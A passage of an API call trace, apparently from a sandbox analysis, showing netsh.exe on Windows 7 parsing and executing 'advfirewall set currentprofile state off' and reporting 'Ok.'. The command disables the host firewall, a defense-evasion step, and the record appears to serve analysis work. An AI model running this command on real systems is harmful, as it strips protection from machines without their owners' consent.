hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0161.193] RegisterContext () returned 0x0 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe0) returned 0x1d7f20 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x17e390 | out: hHeap=0x150000) returned 1 [0161.193] RegisterContext () returned 0x0 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x150) returned 0x1d7250 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d7f20 | out: hHeap=0x150000) returned 1 [0161.193] RegisterContext () returned 0x0 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e390 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0161.193] RegisterContext () returned 0x0 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e410 [0161.193] GetProcessHeap () returned 0x150000 [0161.193] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0161.194] RegisterContext () returned 0x0 [0161.194] GetProcessHeap () returned 0x150000 [0161.194] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x930) returned 0x1d9ef0 [0161.194] GetProcessHeap () returned 0x150000 [0161.194] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d6980 | out: hHeap=0x150000) returned 1 [0161.194] RegisterContext () returned 0x0 [0161.194] GetProcessHeap () returned 0x150000 [0161.194] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x9a0) returned 0x1da830 [0161.194] GetProcessHeap () returned 0x150000 [0161.194] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d9ef0 | out: hHeap=0x150000) returned 1 [0162.255] RegisterContext () returned 0x0 [0162.255] GetProcessHeap () returned 0x150000 [0162.255] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xa10) returned 0x1df190 [0162.255] GetProcessHeap () returned 0x150000 [0162.255] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da830 | out: hHeap=0x150000) returned 1 [0162.255] RegisterContext () returned 0x0 [0162.255] GetProcessHeap () returned 0x150000 [0162.255] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x70) returned 0x17e590 [0162.255] GetProcessHeap () returned 0x150000 [0162.255] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0162.255] SetConsoleCtrlHandler (HandlerRoutine=0x1449198, Add=1) returned 1 [0162.255] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76b10000 [0162.256] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b26d40 [0162.256] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0162.256] FreeLibrary (hLibModule=0x76b10000) returned 1 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-?") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-h") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="?") returned 34 [0162.256] _wcsicmp (_String1="advfirewall", _String2="/?") returned 50 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-v") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-a") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-c") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-f") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-r") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-u") returned 52 [0162.256] _wcsicmp (_String1="advfirewall", _String2="-p") returned 52 [0162.256] GetVersionExW (in: lpVersionInformation=0x1477a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1477a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0162.256] _vsnwprintf (in: _Buffer=0x1455b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x147768 | out: _Buffer="6.1.7601") returned 8 [0162.256] _vsnwprintf (in: _Buffer=0x1455fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x147768 | out: _Buffer="7601") returned 4 [0162.256] _vsnwprintf (in: _Buffer=0x1455d90, _BufferCount=0x103, _Format="%d", _ArgList=0x147768 | out: _Buffer="1") returned 1 [0162.257] _vsnwprintf (in: _Buffer=0x14561b0, _BufferCount=0x103, _Format="%d", _ArgList=0x147768 | out: _Buffer="0") returned 1 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca830 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca850 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1ca870 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca890 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1ca8b0 [0162.257] wcscpy_s (in: _Destination=0x1ca8b0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca870 | out: hHeap=0x150000) returned 1 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca850 | out: hHeap=0x150000) returned 1 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca850 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca870 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x52) returned 0x1bea50 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca8d0 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca8f0 [0162.257] wcscpy_s (in: _Destination=0x1ca8f0, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0162.257] GetProcessHeap () returned 0x150000 [0162.257] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da860 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19ee90 [0162.258] wcscpy_s (in: _Destination=0x19ee90, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da880 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1e) returned 0x1d5e60 [0162.258] wcscpy_s (in: _Destination=0x1d5e60, _SizeInWords=0xf, _Source="currentprofile" | out: _Destination="currentprofile") returned 0x0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da8a0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1da8c0 [0162.258] wcscpy_s (in: _Destination=0x1da8c0, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da8e0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19eeb0 [0162.258] wcscpy_s (in: _Destination=0x19eeb0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1bea50 | out: hHeap=0x150000) returned 1 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca870 | out: hHeap=0x150000) returned 1 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca870 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da900 [0162.258] wcscpy_s (in: _Destination=0x1da900, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca8f0 | out: hHeap=0x150000) returned 1 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca8d0 | out: hHeap=0x150000) returned 1 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca8d0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca8f0 [0162.258] wcscpy_s (in: _Destination=0x1ca8f0, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0162.258] GetProcessHeap () returned 0x150000 [0162.258] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da900 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca870 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1ca870 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19eec0 [0162.259] wcscpy_s (in: _Destination=0x19eec0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19ee90 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da860 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da860 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1e) returned 0x1d5e90 [0162.259] wcscpy_s (in: _Destination=0x1d5e90, _SizeInWords=0xf, _Source="currentprofile" | out: _Destination="currentprofile") returned 0x0 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d5e60 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da880 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da880 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1da900 [0162.259] wcscpy_s (in: _Destination=0x1da900, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da8c0 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da8a0 | out: hHeap=0x150000) returned 1 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da8a0 [0162.259] GetProcessHeap () returned 0x150000 [0162.259] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19ee90 [0162.259] wcscpy_s (in: _Destination=0x19ee90, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19eeb0 | out: hHeap=0x150000) returned 1 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da8e0 | out: hHeap=0x150000) returned 1 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x30) returned 0x1db7d0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1da8e0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da8c0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19eeb0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1e) returned 0x1d5e60 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1da920 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19eed0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1da940 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1da940, Size=0xe) returned 0x1da960 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1da960, Size=0x24) returned 0x1d5ec0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1d5ec0, Size=0x26) returned 0x1d5ef0 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1d5ef0, Size=0x2c) returned 0x1db810 [0162.260] GetProcessHeap () returned 0x150000 [0162.260] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1db810, Size=0x2e) returned 0x1db850 [0162.261] GetProcessHeap () returned 0x150000 [0162.261] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1db850, Size=0x4a) returned 0x1bea50 [0162.261] GetProcessHeap () returned 0x150000 [0162.261] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1bea50, Size=0x4c) returned 0x1beb10 [0162.261] GetProcessHeap () returned 0x150000 [0162.261] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1beb10, Size=0x56) returned 0x1bea50 [0162.261] GetProcessHeap () returned 0x150000 [0162.261] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1bea50, Size=0x58) returned 0x1beb10 [0162.261] GetProcessHeap () returned 0x150000 [0162.261] RtlReAllocateHeap (Heap=0x150000, Flags=0x0, Ptr=0x1beb10, Size=0x5e) returned 0x1d50b0 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d50b0 | out: hHeap=0x150000) returned 1 [0162.262] _wcsnicmp (_String1="advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0162.262] _wcsnicmp (_String1="advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0162.262] _wcsnicmp (_String1="advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0162.262] _wcsnicmp (_String1="advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0162.262] _wcsnicmp (_String1="advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da960 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da940 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x5e) returned 0x1d50b0 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da980 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1da9a0 [0162.262] wcscpy_s (in: _Destination=0x1da9a0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da9c0 [0162.262] GetProcessHeap () returned 0x150000 [0162.262] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da9e0 [0162.263] wcscpy_s (in: _Destination=0x1da9e0, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1daa00 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19eee0 [0162.263] wcscpy_s (in: _Destination=0x19eee0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1daa20 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1e) returned 0x1d5ef0 [0162.263] wcscpy_s (in: _Destination=0x1d5ef0, _SizeInWords=0xf, _Source="currentprofile" | out: _Destination="currentprofile") returned 0x0 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1daa40 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x1daa60 [0162.263] wcscpy_s (in: _Destination=0x1daa60, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1daa80 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x19eef0 [0162.263] wcscpy_s (in: _Destination=0x19eef0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d50b0 | out: hHeap=0x150000) returned 1 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da940 | out: hHeap=0x150000) returned 1 [0162.263] GetProcessHeap () returned 0x150000 [0162.263] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da9e0 | out: hHeap=0x150000) returned 1 [0162.264] GetProcessHeap () returned 0x150000 [0162.264] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1da9e0 [0162.264] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0162.264] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0162.264] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0162.264] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0162.264] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0162.264] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0162.264] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0162.264] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0162.264] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0162.264] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0162.264] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0162.264] _wcsnicmp (_String1="currentprofile", _String2="help", _MaxCount=0xe) returned -5 [0162.264] _wcsnicmp (_String1="currentprofile", _String2="?", _MaxCount=0xe) returned 36 [0162.264] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x48330 | out: _String="domainprofile", _Context=0x48330) returned="domainprofile" [0162.264] _wcsnicmp (_String1="currentprofile", _String2="domainprofile", _MaxCount=0xe) returned -1 [0162.264] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x48360 | out: _String="privateprofile", _Context=0x48360) returned="privateprofile" [0162.264] _wcsnicmp (_String1="currentprofile", _String2="privateprofile", _MaxCount=0xe) returned -13 [0162.264] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x48390 | out: _String="publicprofile", _Context=0x48390) returned="publicprofile" [0162.264] _wcsnicmp (_String1="currentprofile", _String2="publicprofile", _MaxCount=0xe) returned -13 [0162.264] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x483c0 | out: _String="currentprofile", _Context=0x483c0) returned="currentprofile" [0162.264] _wcsnicmp (_String1="currentprofile", _String2="currentprofile", _MaxCount=0xe) returned 0 [0162.264] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0169.118] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x143450, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0169.118] FormatMessageW (in: dwFlags=0x500, lpSource=0x143450, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x143430, nSize=0x0, Arguments=0x143440 | out: lpBuffer="\xe430\x19") returned 0x5 [0169.119] GetStdHandle (nStdHandle=0xfffffff5) returned 0xb8 [0169.119] GetConsoleOutputCP () returned 0x1b5 [0169.119] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0169.119] GetProcessHeap () returned 0x150000 [0169.119] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x6) returned 0x19ef00 [0169.119] GetConsoleOutputCP () returned 0x1b5 [0169.119] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x19ef00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0169.119] WriteFile (in: hFile=0xb8, lpBuffer=0x19ef00*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1433e0, lpOverlapped=0x0 | out: lpBuffer=0x19ef00*, lpNumberOfBytesWritten=0x1433e0*=0x5, lpOverlapped=0x0) returned 1 [0169.119] GetProcessHeap () returned 0x150000 [0169.119] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19ef00 | out: hHeap=0x150000) returned 1 [0169.119] LocalFree (hMem=0x19e430) returned 0x0 [0169.119] FormatMessageW (in: dwFlags=0x500, lpSource=0x1441504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x147460, nSize=0x0, Arguments=0x147470 | out: lpBuffer="\xa940\x1d") returned 0x2 [0169.119] GetStdHandle (nStdHandle=0xfffffff5) returned 0xb8 [0169.119] GetConsoleOutputCP () returned 0x1b5 [0169.120] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x3) returned 0x19ef00 [0169.120] GetConsoleOutputCP () returned 0x1b5 [0169.120] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x19ef00, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0169.120] WriteFile (in: hFile=0xb8, lpBuffer=0x19ef00*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x147410, lpOverlapped=0x0 | out: lpBuffer=0x19ef00*, lpNumberOfBytesWritten=0x147410*=0x2, lpOverlapped=0x0) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19ef00 | out: hHeap=0x150000) returned 1 [0169.120] LocalFree (hMem=0x1da940) returned 0x0 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da8e0 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da8c0 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19eeb0 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d5e60 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da920 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19eed0 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1db7d0 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.120] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca8f0 | out: hHeap=0x150000) returned 1 [0169.120] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca8d0 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19eec0 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca870 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1d5e90 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da860 | out: hHeap=0x150000) returned 1 [0169.121] 